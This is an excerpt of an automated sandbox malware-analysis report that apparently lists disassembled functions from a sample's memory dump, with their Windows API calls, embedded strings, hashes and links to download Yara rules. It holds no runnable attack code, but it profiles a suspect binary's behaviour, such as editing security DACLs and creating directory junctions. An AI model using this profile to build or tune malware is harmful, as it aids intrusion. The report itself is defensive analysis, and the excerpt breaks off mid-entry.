                                              • Instruction Fuzzy Hash: 3E614A71508301AFC701EF54DC85DAFBBE8EF88750F100AADF595972A1DB70AA49CB62
                                              Function 00B982D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00B9831A
                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00B98323
                                              • VariantClear.OLEAUT32(00000000), ref: 00B9832F
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B9841D
                                              • __swprintf.LIBCMT ref: 00B9844D
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00B98479
                                              • VariantInit.OLEAUT32(?), ref: 00B9852A
                                              • SysFreeString.OLEAUT32(?), ref: 00B985BE
                                              • VariantClear.OLEAUT32(?), ref: 00B98618
                                              • VariantClear.OLEAUT32(?), ref: 00B98627
                                              • VariantInit.OLEAUT32(00000000), ref: 00B98665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 3730832054-3931177956
                                              • Opcode ID: af46c0ede3ab4a38dea45470170b8ee13d67506f54566d72b44850fcaad27c52
                                              • Instruction ID: c7b7091b9f9e37f2c3327344a9e8aa1ad32ae230d12d77485b9e7ac8545693d1
                                              • Opcode Fuzzy Hash: af46c0ede3ab4a38dea45470170b8ee13d67506f54566d72b44850fcaad27c52
                                              • Instruction Fuzzy Hash: 34D1AB31A08515EBCF20AF65C884B6EB7F4EF06B00F2485E5F4099B281DF34A844DBA4
                                              Function 00BB49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB4A61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB4AAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: d27c575c94fc49d4e4bc0215dae8632fdb47f01b4bf611ee934da4d13da03744
                                              • Instruction ID: 6ae30fa772ba3ff558c13217aecd4f3d2107093065810356320c9889839b0d27
                                              • Opcode Fuzzy Hash: d27c575c94fc49d4e4bc0215dae8632fdb47f01b4bf611ee934da4d13da03744
                                              • Instruction Fuzzy Hash: 87915A352046019BCB14EF20C491AAAB7E1FF94354F1088E9F8965B3A3CB71FD4ACB81
                                              Function 00BBBE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BBBF26
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BB97E7), ref: 00BBBF82
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BBBFBB
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BBBFFE
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BBC035
                                              • FreeLibrary.KERNEL32(?), ref: 00BBC041
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BBC051
                                              • DestroyIcon.USER32(?,?,?,?,?,00BB97E7), ref: 00BBC060
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BBC07D
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BBC089
                                                • Part of subcall function 00B5312D: __wcsicmp_l.LIBCMT ref: 00B531B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 1212759294-1154884017
                                              • Opcode ID: b8c478ebcce881cb138dfd34c6a8e852904916e4f2875f6dd73ec324e48ccecd
                                              • Instruction ID: a8067d0f6aa4935c43f56a6f5af2b8760581c88971eddeba1dc06ca5271b1f33
                                              • Opcode Fuzzy Hash: b8c478ebcce881cb138dfd34c6a8e852904916e4f2875f6dd73ec324e48ccecd
                                              • Instruction Fuzzy Hash: 1461BD71500618FBEB14EF64DC81FFA7BE8EB08711F104295F915D61D0DBB4AA90CBA0
                                              Function 00B9E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00B9E31F
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B9E32F
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B9E33B
                                              • __wsplitpath.LIBCMT ref: 00B9E399
                                              • _wcscat.LIBCMT ref: 00B9E3B1
                                              • _wcscat.LIBCMT ref: 00B9E3C3
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B9E3D8
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E3EC
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E41E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E43F
                                              • _wcscpy.LIBCMT ref: 00B9E44B
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B9E48A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                              • String ID: *.*
                                              • API String ID: 3566783562-438819550
                                              • Opcode ID: 7e8e163cf72ddb99fa919bd9b95eaf8e3ee9e78b0535cdb20417b49997f83350
                                              • Instruction ID: ab235cd46e11591faf3b41cd46031527feec1f318fef2997db070f3c4a010634
                                              • Opcode Fuzzy Hash: 7e8e163cf72ddb99fa919bd9b95eaf8e3ee9e78b0535cdb20417b49997f83350
                                              • Instruction Fuzzy Hash: FC6147725043459FCB10EF60D884E9EB3E8FF89314F0489AEF99987251DB35E945CB92
                                              Function 00B9A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B9A2C2
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B9A2E3
                                              • __swprintf.LIBCMT ref: 00B9A33C
                                              • __swprintf.LIBCMT ref: 00B9A355
                                              • _wprintf.LIBCMT ref: 00B9A3FC
                                              • _wprintf.LIBCMT ref: 00B9A41A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-3080491070
                                              • Opcode ID: a467d964ed7d5995f9d83ea65168f6a01163d762d3973074e2973c696c328e79
                                              • Instruction ID: 614fc2d75862cf7a3b3f478c035107164ad7da60bc33dbc8a2ea30341e1df09e
                                              • Opcode Fuzzy Hash: a467d964ed7d5995f9d83ea65168f6a01163d762d3973074e2973c696c328e79
                                              • Instruction Fuzzy Hash: 64516A71D00109AACF14EBE4CD46EEEB7F8AF04340F1045E5F505A21A2EB352F99EBA1
                                              Function 00B90065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00B7F8B8,00000001,0000138C,00000001,00000000,00000001,?,00BA3FF9,00000000), ref: 00B9009A
                                              • LoadStringW.USER32(00000000,?,00B7F8B8,00000001), ref: 00B900A3
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • GetModuleHandleW.KERNEL32(00000000,00BF7310,?,00000FFF,?,?,00B7F8B8,00000001,0000138C,00000001,00000000,00000001,?,00BA3FF9,00000000,00000001), ref: 00B900C5
                                              • LoadStringW.USER32(00000000,?,00B7F8B8,00000001), ref: 00B900C8
                                              • __swprintf.LIBCMT ref: 00B90118
                                              • __swprintf.LIBCMT ref: 00B90129
                                              • _wprintf.LIBCMT ref: 00B901D2
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B901E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: fd4b226ff06272e2c59a79406d6fec8ebb3280268f2b199119c99c5d7f642395
                                              • Instruction ID: 42d55dcfb93495721a41d3394824f373dd058970d122b84f79a5e187be2be3d3
                                              • Opcode Fuzzy Hash: fd4b226ff06272e2c59a79406d6fec8ebb3280268f2b199119c99c5d7f642395
                                              • Instruction Fuzzy Hash: 02413A72C00119AACF14FBE4CD96EEEB7BCAF14341F5005A5F505B2092DA256F89DA61
                                              Function 00B9A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CharLowerBuffW.USER32(?,?), ref: 00B9AA0E
                                              • GetDriveTypeW.KERNEL32 ref: 00B9AA5B
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AAA3
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AADA
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AB08
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: b63ffb31421068f93d280c171511c572aabe1782c64ddf9fe39a2bbbb679ea9d
                                              • Instruction ID: 5f011a66f00367193d9982f6ed8b1b3371b4b33e48bb1d2507003513a0b262ad
                                              • Opcode Fuzzy Hash: b63ffb31421068f93d280c171511c572aabe1782c64ddf9fe39a2bbbb679ea9d
                                              • Instruction Fuzzy Hash: 7A518A715043059FC700EF14C881D6AB7F8FF98358F1089ADF896972A1DB31AE0ACB92
                                              Function 00B9A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B9A852
                                              • __swprintf.LIBCMT ref: 00B9A874
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B9A8B1
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B9A8D6
                                              • _memset.LIBCMT ref: 00B9A8F5
                                              • _wcsncpy.LIBCMT ref: 00B9A931
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B9A966
                                              • CloseHandle.KERNEL32(00000000), ref: 00B9A971
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00B9A97A
                                              • CloseHandle.KERNEL32(00000000), ref: 00B9A984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: a2a573bb1f6c685b7b2211445a911f91263ea7b7190aae5d347fbadd306ca4c0
                                              • Instruction ID: 8a99dce0c9017c06d39f9bb04de527cbb2069add856d1950a4ea5746e26e0d2e
                                              • Opcode Fuzzy Hash: a2a573bb1f6c685b7b2211445a911f91263ea7b7190aae5d347fbadd306ca4c0
                                              • Instruction Fuzzy Hash: 9131C17251021AABDB219FA4DC49FEB73FCEF89701F1041F6F908D61A0EB7096448B65
                                              Function 00BBC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BB982C,?,?), ref: 00BBC0C8
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0DF
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0EA
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0F7
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC100
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC10F
                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC118
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC11F
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC130
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC3C7C,?), ref: 00BBC149
                                              • GlobalFree.KERNEL32(00000000), ref: 00BBC159
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BBC17D
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BBC1A8
                                              • DeleteObject.GDI32(00000000), ref: 00BBC1D0
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BBC1E6
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: feaa8492d03f1f2d0d38791f16994bbf6f9841f40e88f27dae028d5fea62b079
                                              • Instruction ID: 9e6e03aa4e88202feb27365f57edf508fdc38caf0f7c26120c9113994db1aecf
                                              • Opcode Fuzzy Hash: feaa8492d03f1f2d0d38791f16994bbf6f9841f40e88f27dae028d5fea62b079
                                              • Instruction Fuzzy Hash: DB412975600208EFDB21EF65DC88EAFBBB8EF89711F108058F905EB260DB709941DB60
                                              Function 00B9DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                              Download Yara Rule
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 00B9E053
                                              • _wcscat.LIBCMT ref: 00B9E06B
                                              • _wcscat.LIBCMT ref: 00B9E07D
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B9E092
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E0A6
                                              • GetFileAttributesW.KERNEL32(?), ref: 00B9E0BE
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B9E0D8
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E0EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: 67db104163ef52ef178529e7fa0ce1d2b7cf3baee0a6531396775a682a3475d7
                                              • Instruction ID: 7c48ab1b91aac4147aa2c8b5ef232cecc02d6bf2a17d81c2a5af8239b15b3c39
                                              • Opcode Fuzzy Hash: 67db104163ef52ef178529e7fa0ce1d2b7cf3baee0a6531396775a682a3475d7
                                              • Instruction Fuzzy Hash: 0C8191715043419FCB24EF25C885A6AB7E8EF99310F1888BEF88AD7250E734ED44CB52
                                              Function 00BBC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BBC8A4
                                              • GetFocus.USER32 ref: 00BBC8B4
                                              • GetDlgCtrlID.USER32(00000000), ref: 00BBC8BF
                                              • _memset.LIBCMT ref: 00BBC9EA
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BBCA15
                                              • GetMenuItemCount.USER32(?), ref: 00BBCA35
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BBCA48
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BBCA7C
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BBCAC4
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BBCAFC
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BBCB31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: 5f9c176dc7b9e523ca099014581e339f3f60823068c553e105a232a35ecc9540
                                              • Instruction ID: a0381bdeddfcf33105abc5a456cfb0d42e9b8be2aabba82532df1718f9849d4d
                                              • Opcode Fuzzy Hash: 5f9c176dc7b9e523ca099014581e339f3f60823068c553e105a232a35ecc9540
                                              • Instruction Fuzzy Hash: 4A816971208305AFD721DF14C985EBABBE8FB88354F1049ADF99597291CBB0D905CBA2
                                              Function 00B88ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                                • Part of subcall function 00B88E20: GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                                • Part of subcall function 00B88E20: GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                                • Part of subcall function 00B88E20: HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                                • Part of subcall function 00B88EBD: GetProcessHeap.KERNEL32(00000008,00B88916,00000000,00000000,?,00B88916,?), ref: 00B88EC9
                                                • Part of subcall function 00B88EBD: HeapAlloc.KERNEL32(00000000,?,00B88916,?), ref: 00B88ED0
                                                • Part of subcall function 00B88EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B88916,?), ref: 00B88EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B88B2E
                                              • _memset.LIBCMT ref: 00B88B43
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B88B62
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88B73
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00B88BB0
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B88BCC
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88BE9
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B88BF8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B88BFF
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B88C20
                                              • CopySid.ADVAPI32(00000000), ref: 00B88C27
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B88C58
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B88C7E
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B88C92
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
